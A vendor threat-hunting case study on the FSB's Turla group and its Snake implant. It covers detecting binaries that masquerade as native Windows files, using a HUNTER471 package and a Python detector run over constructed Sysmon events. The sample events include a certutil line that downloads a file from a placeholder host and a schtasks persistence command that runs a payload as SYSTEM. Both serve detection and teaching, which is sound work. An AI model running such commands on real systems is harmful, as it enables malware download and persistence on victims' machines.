Intel 471

Threat Hunting Case Study: Uncovering Turla

Nov 11, 2024

Russia has long been a military power, a nuclear power, a space power and in recent decades, a cyber power. It has been one of the most capable cyber actors, going back to the late 1990s when Russian state hackers stole classified documents and military research from U.S. universities and government agencies. The stolen documents, if stacked on top of one another, would have been taller than the Washington Monument (555 feet or 169 meters). These incidents, dubbed “Moonlight Maze” as described in Thomas Rid’s book “Rise of the Machines,” marked one of the world’s first advanced persistent threat (APT) attacks. Russia’s intelligence and security agencies continue to operate highly skilled groups of offensive attackers. Those APT groups are spread across its intelligence and security agencies and the Ministry of Defense. They engage in a broad range of cyber and influence operations tied to Russia’s strategic objectives. These include exploiting adversary systems, establishing footholds, conducting cyber espionage operations and running disinformation and misinformation campaigns designed to undermine Western narratives. One of the most effective and long-running Russian groups is Turla, a unit known as Center 16 housed within Russia’s Federal Security Service, or FSB. Researchers found that this group, which is active today, may have been connected with Moonlight Maze.

In 2023, the U.S. Department of Justice announced a counterintelligence operation called MEDUSA that targeted one of Turla’s most sophisticated tools: an extremely stealthy peer-to-peer malware network called Snake. The U.S. government had investigated Snake and the malware associated with it for almost 20 years, including monitoring FSB officers at a facility in Ryazan, Russia, who ran daily operations with Snake. The malware and its botnet were used to steal military documents, compromise journalists, infiltrate critical infrastructure and exfiltrate secrets of interest to Russia.

Turla regularly upgraded Snake to keep it what the U.S. government called “the FSB’s most sophisticated long-term cyber espionage malware implant.” Snake’s modular design allowed individual components to be updated without reworking the whole implant, and it was cross-platform, running on Windows, macOS and Linux. The Cybersecurity and Infrastructure Security Agency (CISA) said the malware had “a rare level of stealth.” Infected hosts formed their own botnet, and stolen data was routed through other infected machines rather than directly to its operators, to evade the monitoring and alerting of signals intelligence services. In the course of studying Snake, the FBI worked out how to decrypt and decode its communications and built a tool called PERSEUS that could communicate with infected machines. That gave the FBI an opportunity to dismantle Snake’s network: it sought, and a federal judge granted, authorization to issue commands to Snake-infected computers that caused the malware to disable itself, a massive success in turning an invasive tool against itself. Russia will invariably retool, but the dismantling of Snake marked a significant blow.

Turla is still an active threat group. In this threat hunting case study, we’ll demonstrate how to use a hunt package in the Community Edition of HUNTER471 to hunt for a common persistence behavior associated with Turla.

Hunting Turla

Threat hunts start with strong intelligence about the attack behaviors of an adversary. In May 2023, the Five Eyes intelligence partners published an advisory describing the tactics, techniques and procedures (TTPs) used by Turla with its Snake implant. Once Snake infected a Windows system, it persisted through a service named “WerFaultSvc.” When the service started, it launched an executable that decrypted Snake’s components and loaded them into memory on the victim’s machine. According to the advisory, that executable was named to mimic “WerFault.exe,” the native Windows Error Reporting binary, one of the native executables sometimes referred to as living-off-the-land binaries, or LOLBins. By giving malware components the same or similar names as legitimate Windows binaries, attackers aim to escape scrutiny from security tools and analysts. MITRE ATT&CK, the knowledge base of adversary tactics and techniques, catalogs this behavior: Masquerading (T1036) is a technique under the Defense Evasion tactic, and its sub-techniques describe the specific forms it takes.

Fig1
The definition of masquerading in MITRE ATT&CK.

When we expand the menu of sub-techniques, we see Turla’s exact behavior described in sub-technique T1036.005: “Match Legitimate Name or Location.”

Fig2
MITRE ATT&CK’s description of a sub-technique of masquerading, which involves trying to hide malicious code by using the same or similar names as legitimate Windows binaries.

During boot, Snake’s version of “WerFault.exe” is executed from the %windows%\WinSxS\ directory. The legitimate binary is normally found in the Windows System32 or SysWOW64 directory. This blending can be effective if analysts are not examining a binary’s absolute file path. One caveat when hunting on this: WinSxS is the Windows component store, which legitimately holds backing copies of many system files (the binaries in System32 are hard links into it), so the mere presence of a WerFault.exe somewhere under WinSxS is not suspicious on its own; a service executing it from there, rather than from System32, is. Even when a malicious component carries the same name as a legitimate binary, clues like this give it away.

We can use this behavior as a starting point for a threat hunt. Our analysts have written a threat hunting package for HUNTER471 that is designed to identify when native Windows executables are moved or are copied out of their native directories and placed elsewhere, possibly for the purpose of masquerading. This particular hunt package is called “Copying Files from Native Windows Directory for Masquerading” and it is available for free within the Community Edition of HUNTER471. This hunt package is compatible with endpoint detection and response (EDR) and logging systems including CrowdStrike, Microsoft Defender, Palo Alto Cortex XDR, SentinelOne, Splunk and Trend Micro Vision One.

Fig3
The HUNTER471 package that can identify malicious binaries masquerading as legitimate Windows binaries.

The query logic table shows how this hunt works. At its core is a long list of native Windows binaries (LOLBins) that ship with every Windows system. Ordinarily, hunting on file names is a poor strategy: names of malicious components are unreliable indicators of compromise (IoCs) because adversaries can rename their payloads at will (“1.bat,” “2.bat,” “3.bat” and so on), and if the adversary controls a name, they will change it. Masquerading inverts this. To blend in, the attacker deliberately picks a name that already exists in the environment, so the set of names to look for is the fixed set of native Windows binaries rather than anything the attacker chooses. That is why the query is so large, as seen in this example hunt in Splunk below.

Fig4

The most important part of this System Monitor (Sysmon) query in Splunk is the first condition. To prevent an overwhelming number of false positives, we need to exclude LOLBins running from their normal, expected locations. In this query, we eliminate native binaries in System32 or SysWOW64. Two details matter when writing that exclusion: Windows paths are case-insensitive, so the match must be too, and the check should be anchored on the full directory (C:\Windows\System32\ at the start of the path) rather than a substring match, because a substring test would also exclude a binary staged at a path such as C:\Users\Public\Windows\System32\schtasks.exe.

Fig5
This is the query logic aimed at filtering out legitimate Windows binaries in the correct directories but alerting on ones that are not.

What kind of results should be flagged from this query for further investigation? The first result involves the LOLBin “schtasks.exe,” or scheduled tasks.

Fig6
This is the first result from the query logic shown above.

Why did this trigger a result? The absolute file path shows “schtasks.exe” running from the Public user profile directory (C:\Users\Public), an abnormal location for a native binary. Adversaries love to abuse the Public directory because it is accessible to every user on the machine, it usually holds no important data and it often escapes scrutiny. The results also show command-line arguments that are not normally expected with scheduled tasks. This is suspicious and should be fully investigated. To get closer to the root cause, threat hunters should identify the parent process that executed “schtasks.exe” and pivot on it: what wrote the binary into the Public directory, what else that parent spawned and whether the task it created points at another payload.
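As an added worked example (not the HUNTER471 package or the Splunk query shown in the figures), the Python below applies the hunt logic described above, a list of native binary names combined with an anchored, case-insensitive exclusion of System32 and SysWOW64, to a handful of constructed Sysmon Event ID 1 (process creation) records, and performs the triage steps from the result above: it notes execution from the Public directory, flags unusual schtasks switches and records the parent process as the next pivot. It also covers the Turla persistence path from earlier in the post, WerFault.exe executing from WinSxS. The binary list is a small subset, the WinSxS subdirectory name and all events are constructed, and the schtasks switch heuristic is this example’s own assumption, not something taken from the advisory.

```python
"""Hunt for native Windows binaries (LOLBins) executing from outside their home
directories, run over constructed Sysmon Event ID 1 records.
Added example for this post; it is not the HUNTER471 package or its Splunk query."""
from dataclasses import dataclass, field
import ntpath

# Subset of native Windows binaries; the real hunt package carries a much longer list.
LOLBIN_NAMES = {
    "schtasks.exe", "werfault.exe", "rundll32.exe", "regsvr32.exe",
    "certutil.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe",
}

# Home directories as lower-cased prefixes anchored at the drive root.
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Triage heuristic (assumption for this example, not from the advisory): a task
# created from a user-writable path that sets the run-as account or run level.
SUSPICIOUS_SCHTASKS_FLAGS = {"/ru", "/rl"}


@dataclass
class ProcEvent:           # the Sysmon Event ID 1 fields the hunt needs
    image: str
    command_line: str
    parent_image: str


@dataclass
class Finding:
    image: str
    parent_image: str      # next pivot: what launched the masquerading binary
    reasons: list = field(default_factory=list)


def normalize(path: str) -> str:
    """Windows paths are case-insensitive; compare them lower-cased with backslashes."""
    return path.replace("/", "\\").lower()


def in_expected_dir(image: str) -> bool:
    """Anchored prefix match, so C:\\Users\\Public\\Windows\\System32\\x.exe is NOT excluded."""
    return normalize(image).startswith(EXPECTED_DIRS)


def naive_excluded(image: str) -> bool:
    """A substring filter, included only to show the evasion it allows."""
    p = normalize(image)
    return "system32" in p or "syswow64" in p


def hunt(events):
    """Return one Finding per LOLBin-named process running outside its home directory."""
    findings = []
    for ev in events:
        p = normalize(ev.image)
        name = ntpath.basename(p)
        if name not in LOLBIN_NAMES or in_expected_dir(ev.image):
            continue
        f = Finding(ev.image, ev.parent_image, [f"{name} executed from an unexpected path"])
        if p.startswith("c:\\users\\public\\"):
            f.reasons.append("runs from the Public profile, a common staging location")
        if "\\winsxs\\" in p:
            f.reasons.append("runs from the WinSxS component store, which holds backing "
                             "copies of system files but is rarely an execution path")
        if name == "schtasks.exe":
            hits = sorted({t.lower() for t in ev.command_line.split()} & SUSPICIOUS_SCHTASKS_FLAGS)
            if hits:
                f.reasons.append("unusual schtasks flags: " + " ".join(hits))
        findings.append(f)
    return findings


# Constructed sample telemetry; the WinSxS subdirectory name is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\Public\schtasks.exe",
              r"schtasks.exe /create /tn Updater /tr C:\Users\Public\up.exe /sc minute /mo 5 /ru SYSTEM /rl HIGHEST",
              r"C:\Users\Public\update.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe /query", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"c:\WINDOWS\SysWOW64\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\WinSxS\x86_constructed-component-dir\WerFault.exe", "WerFault.exe",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(r"C:\Users\Public\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -f http://example.invalid/a a.bin", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\Public\notepad.exe", "notepad.exe", r"C:\Windows\explorer.exe"),  # not on the list
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding.image, "<-", finding.parent_image)
        for reason in finding.reasons:
            print("   ", reason)
```

Run directly, it prints each finding with its parent process; the two legitimate System32 and SysWOW64 executions and the unlisted notepad.exe produce nothing. `naive_excluded` is there only to show why a substring match on “system32” is a weaker filter than an anchored prefix: it would silently drop the certutil.exe staged under C:\Users\Public\Windows\System32\.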

This guide to threat hunting for Turla is also available on video here. Also, register for the Community Edition of our threat hunting platform, HUNTER471, where a number of free sample threat hunts are available. Stay safe and happy hunting!
